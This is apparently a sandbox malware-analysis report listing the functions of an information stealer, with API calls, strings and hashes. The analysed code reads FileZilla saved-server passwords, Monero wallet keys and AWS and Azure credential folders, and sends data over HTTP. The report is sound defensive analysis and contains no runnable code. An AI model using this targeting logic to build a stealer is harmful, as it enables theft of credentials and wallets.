                  • API String ID:
                  • Opcode ID: 009d44e2599915bfefa12373af0db249c59c9844bcd5f8e56c4220724dbdd75f
                  • Instruction ID: 4ad7a5191b9cdc6df6db7c80e982cd1ee20b2128748fd00bb784b7f8c4843e90
                  • Opcode Fuzzy Hash: 009d44e2599915bfefa12373af0db249c59c9844bcd5f8e56c4220724dbdd75f
                  • Instruction Fuzzy Hash: 0D2153B240C7189FD715BE6CDC956BAF7E4EF18750F06092DDAD583300EA70A9148B9B
                  Function 00149750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00140250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00150DBA,00150DB7,00150DB6,00150DB3), ref: 00140362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00140369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00140385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 001403CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 001403DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00140419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00140463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 0014051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 0014054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00140562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00140571
                  • lstrcat.KERNEL32(?,url: ), ref: 00140580
                  • lstrcat.KERNEL32(?,00000000), ref: 00140593
                  • lstrcat.KERNEL32(?,00151678), ref: 001405A2
                  • lstrcat.KERNEL32(?,00000000), ref: 001405B5
                  • lstrcat.KERNEL32(?,0015167C), ref: 001405C4
                  • lstrcat.KERNEL32(?,login: ), ref: 001405D3
                  • lstrcat.KERNEL32(?,00000000), ref: 001405E6
                  • lstrcat.KERNEL32(?,00151688), ref: 001405F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00140604
                  • lstrcat.KERNEL32(?,00000000), ref: 00140617
                  • lstrcat.KERNEL32(?,00151698), ref: 00140626
                  • lstrcat.KERNEL32(?,0015169C), ref: 00140635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 0014068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: ad1a2ae9ba83907ed9d635d84f66c089f6ea2c8933d781a35a77e90a0aeeee70
                  • Instruction ID: c300a609b0c6a26d2d21c5f71bdea92ccb1b66163fc4a412e54dcfd92014311b
                  • Opcode Fuzzy Hash: ad1a2ae9ba83907ed9d635d84f66c089f6ea2c8933d781a35a77e90a0aeeee70
                  • Instruction Fuzzy Hash: F9D17371940108ABDB05EBF0DD96EEE773CEF68301F514418F516A70A1DF74AA4ACB62
                  Function 00135960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001359F8
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 00135A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00135B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0102E4E0,00000000,?,01029EE8,00000000,?,00151A1C), ref: 00135E71
                  • lstrlen.KERNEL32(00000000), ref: 00135E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00135E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00135E9A
                  • lstrlen.KERNEL32(00000000), ref: 00135EAF
                  • lstrlen.KERNEL32(00000000), ref: 00135ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00135EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00135F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00135F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00135F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00135FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00135FBD
                  • HttpOpenRequestA.WININET(00000000,0102E530,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00135BF8
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • InternetCloseHandle.WININET(00000000), ref: 00135FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: f676adba3f6a66a961fda43b87a48df7921222efb60c649885012b0b025b4fa7
                  • Instruction ID: 272a835775872935f5a1661868ba64dc212b893ac9ce4ca17ac68236ac117ad0
                  • Opcode Fuzzy Hash: f676adba3f6a66a961fda43b87a48df7921222efb60c649885012b0b025b4fa7
                  • Instruction Fuzzy Hash: AA1210718A0119ABEB15EBA0DC95FEEB37CFF64701F914199B10A630A1DF702A49CF61
                  Function 0013CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0013D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0013D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D208
                  • lstrcat.KERNEL32(?,00151478), ref: 0013D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D22A
                  • lstrcat.KERNEL32(?,0015147C), ref: 0013D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D24C
                  • lstrcat.KERNEL32(?,00151480), ref: 0013D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D26E
                  • lstrcat.KERNEL32(?,00151484), ref: 0013D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D290
                  • lstrcat.KERNEL32(?,00151488), ref: 0013D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D2B2
                  • lstrcat.KERNEL32(?,0015148C), ref: 0013D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D2D4
                  • lstrcat.KERNEL32(?,00151490), ref: 0013D2E3
                    • Part of subcall function 0014A820: lstrlen.KERNEL32(00134F05,?,?,00134F05,00150DDE), ref: 0014A82B
                    • Part of subcall function 0014A820: lstrcpy.KERNEL32(00150DDE,00000000), ref: 0014A885
                  • lstrlen.KERNEL32(?), ref: 0013D32A
                  • lstrlen.KERNEL32(?), ref: 0013D339
                    • Part of subcall function 0014AA70: StrCmpCA.SHLWAPI(01028A30,0013A7A7,?,0013A7A7,01028A30), ref: 0014AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0013D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 2a162adc38ce60eef872948f8d07c945b3c0669e48c52889c4fdd8fbba501102
                  • Instruction ID: 2c0ab1dabc1d2c39e10bb5a9a358c2585afac93090f29f3aa6dd251742ee04f7
                  • Opcode Fuzzy Hash: 2a162adc38ce60eef872948f8d07c945b3c0669e48c52889c4fdd8fbba501102
                  • Instruction Fuzzy Hash: C3E16E71940109ABDB15EBA0DD96EEE737CFF64302F510058F106A70A1DF35AE4ACB62
                  Function 0013C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0102CDF0,00000000,?,0015144C,00000000,?,?), ref: 0013CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0013CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0013CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0013CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0013CAD9
                  • StrStrA.SHLWAPI(?,0102CE50,00150B52), ref: 0013CAF7
                  • StrStrA.SHLWAPI(00000000,0102CF10), ref: 0013CB1E
                  • StrStrA.SHLWAPI(?,0102D0D8,00000000,?,00151458,00000000,?,00000000,00000000,?,01028A20,00000000,?,00151454,00000000,?), ref: 0013CCA2
                  • StrStrA.SHLWAPI(00000000,0102D1D8), ref: 0013CCB9
                    • Part of subcall function 0013C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0013C871
                    • Part of subcall function 0013C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0013C87C
                  • StrStrA.SHLWAPI(?,0102D1D8,00000000,?,0015145C,00000000,?,00000000,01028A00), ref: 0013CD5A
                  • StrStrA.SHLWAPI(00000000,01028960), ref: 0013CD71
                    • Part of subcall function 0013C820: lstrcat.KERNEL32(?,00150B46), ref: 0013C943
                    • Part of subcall function 0013C820: lstrcat.KERNEL32(?,00150B47), ref: 0013C957
                    • Part of subcall function 0013C820: lstrcat.KERNEL32(?,00150B4E), ref: 0013C978
                  • lstrlen.KERNEL32(00000000), ref: 0013CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0013CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: c89375d914e79ba883632fc4e8d51d47ed6a75a9fe510937f9b87a1aee207857
                  • Instruction ID: cd81405bcdcffe35d013cadcd6cade799cd5e6e6068dd8c4e1af4e916c83c4fd
                  • Opcode Fuzzy Hash: c89375d914e79ba883632fc4e8d51d47ed6a75a9fe510937f9b87a1aee207857
                  • Instruction Fuzzy Hash: C3E110B1940109ABEB15EBA0DC91FEEB778EF64305F814159F106771A1EF306A4ACF62
                  Function 00148320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0102AF40,00000000,00020019,00000000,001505B6), ref: 001483A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00148426
                  • wsprintfA.USER32 ref: 00148459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0014847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0014848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00148499
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 0dd3c5ca9ae6f13d29f1a73aa565c16326521587574dfa9268feaac0bc74773d
                  • Instruction ID: a1f267233b4a802d8eef2a3e308462dd87b7e14f618ed52eeeca7916430cbce4
                  • Opcode Fuzzy Hash: 0dd3c5ca9ae6f13d29f1a73aa565c16326521587574dfa9268feaac0bc74773d
                  • Instruction Fuzzy Hash: 91813BB1950118ABEB29DF54CC91FEEB7B8FF58701F408298E109A6190DF716B89CF91
                  Function 00144D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00144DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00144DCD
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 0014492C
                    • Part of subcall function 00144910: FindFirstFileA.KERNEL32(?,?), ref: 00144943
                  • lstrcat.KERNEL32(?,00000000), ref: 00144E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00144E59
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FDC), ref: 00144971
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FE0), ref: 00144987
                    • Part of subcall function 00144910: FindNextFileA.KERNEL32(000000FF,?), ref: 00144B7D
                    • Part of subcall function 00144910: FindClose.KERNEL32(000000FF), ref: 00144B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00144EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00144EE5
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 001449B0
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,001508D2), ref: 001449C5
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 001449E2
                    • Part of subcall function 00144910: PathMatchSpecA.SHLWAPI(?,?), ref: 00144A1E
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,0102E560), ref: 00144A4A
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,00150FF8), ref: 00144A5C
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,?), ref: 00144A70
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,00150FFC), ref: 00144A82
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,?), ref: 00144A96
                    • Part of subcall function 00144910: CopyFileA.KERNEL32(?,?,00000001), ref: 00144AAC
